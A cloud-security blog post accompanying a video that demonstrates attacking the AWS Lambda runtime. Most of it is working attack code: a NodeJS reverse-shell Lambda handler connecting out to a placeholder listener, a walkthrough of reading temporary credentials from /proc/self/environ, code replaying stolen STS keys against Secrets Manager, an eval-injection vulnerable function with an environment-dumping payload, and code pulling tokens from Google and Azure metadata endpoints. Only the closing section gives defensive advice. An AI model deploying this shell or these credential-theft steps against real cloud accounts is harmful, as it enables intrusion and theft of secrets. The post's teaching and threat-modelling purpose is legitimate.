Cloud Security - Exploring the AWS Lambda runtime execution environment

Serverless computing has been gaining popularity, especially in the cloud. While the service offers great convenience to most users, who have no access to the underlying environment, hackers are interested in understanding how things work behind the scenes, and we want to answer some basic cybersecurity questions. For instance, what software, including the operating system and middleware, makes up the application stack? Where does the service store credentials in the environment? And most importantly, how can a serverless deployment be hacked or leveraged in an attack, if at all possible?

In the following video demonstration, we explore the AWS Lambda runtime execution environment, which serves many use cases, from building application APIs to configuring cloud resources. A malicious reverse shell backdoor function is written and deployed as a Lambda, allowing us to explore the runtime execution environment interactively -

https://www.youtube.com/watch?v=khF1PMjQv_E&t=10s
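
For reference, a minimal sketch of the kind of NodeJS reverse shell handler described in the video might look like the following. The listener address and port are placeholders for a machine you control in your own lab, and the actual function used in the demo may differ in its details.

```javascript
const net = require('net');
const { spawn } = require('child_process');

// Placeholder listener details - replace with a host you control in your own lab
// (203.0.113.0/24 is a documentation address range).
const ATTACKER_HOST = '203.0.113.10';
const ATTACKER_PORT = 4444;

exports.handler = async () =>
  new Promise((resolve) => {
    const sock = net.connect(ATTACKER_PORT, ATTACKER_HOST, () => {
      const sh = spawn('/bin/sh');   // /bin/sh is available in the Lambda runtime
      sock.pipe(sh.stdin);           // attacker keystrokes -> shell
      sh.stdout.pipe(sock);          // shell output -> attacker
      sh.stderr.pipe(sock);
      sh.on('exit', () => {          // keep the invocation alive until the shell exits
        sock.end();
        resolve({ statusCode: 200, body: 'done' });
      });
    });
    sock.on('error', () => resolve({ statusCode: 500, body: 'connect failed' }));
  });
```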

The scenario starts with an attempt to access some secrets secured in AWS Secrets Manager. Since we do not have valid credentials, the attempt fails. However, if we can identify another AWS resource that is allowed to access the secrets, we can leverage it to achieve our goal. In this case, we look at AWS Lambda as a proof of concept. First we write a NodeJS reverse shell function and deploy it to AWS Lambda via AWS SAM, which generates a CloudFormation stack that deploys our Lambda function together with an API Gateway. Then we invoke our backdoor through the API Gateway with a simple curl, and the backdoor connects back to our Linux machine listening on netcat.

We can then explore the environment. We have to pull out the basic details quickly because the process times out; a longer timeout can be configured in the SAM template, but it is still limited. The timeout is not a real obstacle, though, since we can always re-invoke the function. Here we find, for example, the CPU info, operating system and NodeJS version. We also list the current directory and identify the user, which is generated by the AWS service.

Most importantly, back to our question: where can we find the security credentials used by the service? Not many options, right? Make a guess. Bingo! They are in the environment variables. Let's cat /proc/self/environ, and the temporary AWS access key (the one starting with "ASIA....", issued by STS) and session token of the Lambda execution role can be retrieved. With the stolen credentials we can try to access Secrets Manager again, provided the role has the required permissions. The environment is actually quite restrictive, but we can still write to the /tmp directory, and as a proof of concept, we create another reverse shell that connects back to us on a different port.
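
To illustrate the credential re-use step, here is a rough sketch of replaying the stolen temporary credentials from our own machine against Secrets Manager, written with the AWS SDK for JavaScript v3. The region, secret name and credential values are placeholders; the call returns AccessDeniedException if the execution role is not allowed to read that secret.

```javascript
const {
  SecretsManagerClient,
  GetSecretValueCommand,
} = require('@aws-sdk/client-secrets-manager');

// All values below are placeholders: the target's region and secret name,
// plus the temporary credentials lifted from /proc/self/environ.
const client = new SecretsManagerClient({
  region: 'us-east-1',
  credentials: {
    accessKeyId: 'ASIA................',     // AWS_ACCESS_KEY_ID
    secretAccessKey: '<AWS_SECRET_ACCESS_KEY>',
    sessionToken: '<AWS_SESSION_TOKEN>',
  },
});

client
  .send(new GetSecretValueCommand({ SecretId: 'demo/secret' }))
  .then((res) => console.log(res.SecretString))
  .catch((err) => console.error(err.name)); // AccessDeniedException if the role cannot read it
```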

Apart from stealing the AWS credentials, sometimes you may discover application credentials in various places by examining the file system and environment. Where do developers like to put their application passwords and keys? Hardcoded in source code? In config files? Also in environment variables? Or in password vaults / Secrets Manager? You name it.

This is just an experiment that allows us to explore the serverless computing environment, but how can an attacker inject or deploy the malicious code in the first place in a practical attack scenario? Well, there are many possibilities: it could be a coding or open-source software bug such as insecure deserialization, dynamic code evaluation, or any other kind of code injection flaw in the serverless function, or a supply chain attack, a compromised development workstation, a compromised code repository used for deployment, or a compromised build machine....
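
As a purely hypothetical illustration of the first category, a serverless function with a dynamic code evaluation flaw might look like the sketch below. Any caller who can reach the API can then run arbitrary code inside the runtime environment, with no need to compromise the deployment pipeline at all.

```javascript
// Hypothetical vulnerable Lambda: it evaluates a caller-supplied expression.
exports.handler = async (event) => {
  const { expression } = JSON.parse(event.body || '{}');
  // VULNERABLE: attacker-controlled input reaches eval(), e.g.
  // expression = "require('child_process').execSync('cat /proc/self/environ').toString()"
  const result = eval(expression);
  return { statusCode: 200, body: JSON.stringify({ result }) };
};
```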

Similar techniques can be employed against other cloud service providers as well. For example, you can create a reverse shell in Go for Google Cloud Functions running the Go runtime on Ubuntu and go after the instance metadata service (IMDS), or build a .NET version for Azure running on Debian and follow the Managed Service Identity endpoint.
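
The credential-theft step translates fairly directly. As a rough sketch (shown in NodeJS rather than Go or .NET, to stay consistent with the rest of this post), once you have code execution inside the function you can query the metadata / managed identity endpoints. The endpoint paths, API versions and environment variable names below are based on the providers' documented interfaces and may vary by platform, so treat them as assumptions to verify.

```javascript
const http = require('http');

// Small helper: GET a URL with custom headers and return the body.
function get(url, headers) {
  return new Promise((resolve, reject) => {
    http
      .get(url, { headers }, (res) => {
        let body = '';
        res.on('data', (c) => (body += c));
        res.on('end', () => resolve(body));
      })
      .on('error', reject);
  });
}

// Google Cloud Functions: the metadata server hands out an OAuth token
// for the runtime service account.
get(
  'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token',
  { 'Metadata-Flavor': 'Google' }
).then(console.log);

// Azure Functions with a managed identity: the MSI endpoint and key are
// exposed through environment variables (IDENTITY_ENDPOINT / IDENTITY_HEADER).
get(
  `${process.env.IDENTITY_ENDPOINT}?resource=https://management.azure.com/&api-version=2019-08-01`,
  { 'X-IDENTITY-HEADER': process.env.IDENTITY_HEADER }
).then(console.log);
```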

Finally, best practice again, the same as in our previous cyber attack illustrations: wear the attacker's hat and threat model your serverless deployment, even if you think you do not need to care much about the underlying environment. Maintain security hygiene, limit access and set up monitoring for threat detection; robust logging and monitoring can also facilitate threat hunting as an additional layer of defence. Taking AWS as an example, you should configure a VPC and Security Groups for your serverless deployment, limit it to private subnets, configure egress rules to filter traffic by port and CIDR / IP range, enable VPC flow logs and set up CloudWatch monitoring for rejected traffic. Configure VPC endpoints for services like S3, and set up resource policies to limit access to requests originating from the Lambda VPC.
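
As one concrete example of such a resource policy, the sketch below applies an S3 bucket policy that denies requests not arriving through a specific VPC endpoint, using the AWS SDK for JavaScript v3. The bucket name, region and endpoint ID are placeholders.

```javascript
const { S3Client, PutBucketPolicyCommand } = require('@aws-sdk/client-s3');

// Placeholders: bucket name and the ID of the Lambda VPC's S3 endpoint.
const BUCKET = 'my-app-bucket';
const VPC_ENDPOINT_ID = 'vpce-0123456789abcdef0';

const policy = {
  Version: '2012-10-17',
  Statement: [
    {
      Sid: 'DenyAccessOutsideLambdaVpcEndpoint',
      Effect: 'Deny',
      Principal: '*',
      Action: 's3:*',
      Resource: [`arn:aws:s3:::${BUCKET}`, `arn:aws:s3:::${BUCKET}/*`],
      // Requests that do not come through the named VPC endpoint are denied.
      // In practice you would also exempt your admin / break-glass principals
      // (e.g. with an aws:PrincipalArn condition) to avoid locking yourself out.
      Condition: { StringNotEquals: { 'aws:SourceVpce': VPC_ENDPOINT_ID } },
    },
  ],
};

new S3Client({ region: 'us-east-1' })
  .send(new PutBucketPolicyCommand({ Bucket: BUCKET, Policy: JSON.stringify(policy) }))
  .then(() => console.log('bucket policy applied'));
```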

My Youtube channel - https://www.youtube.com/channel/UCXSZyDvr7tpT62t3XvdCc3w
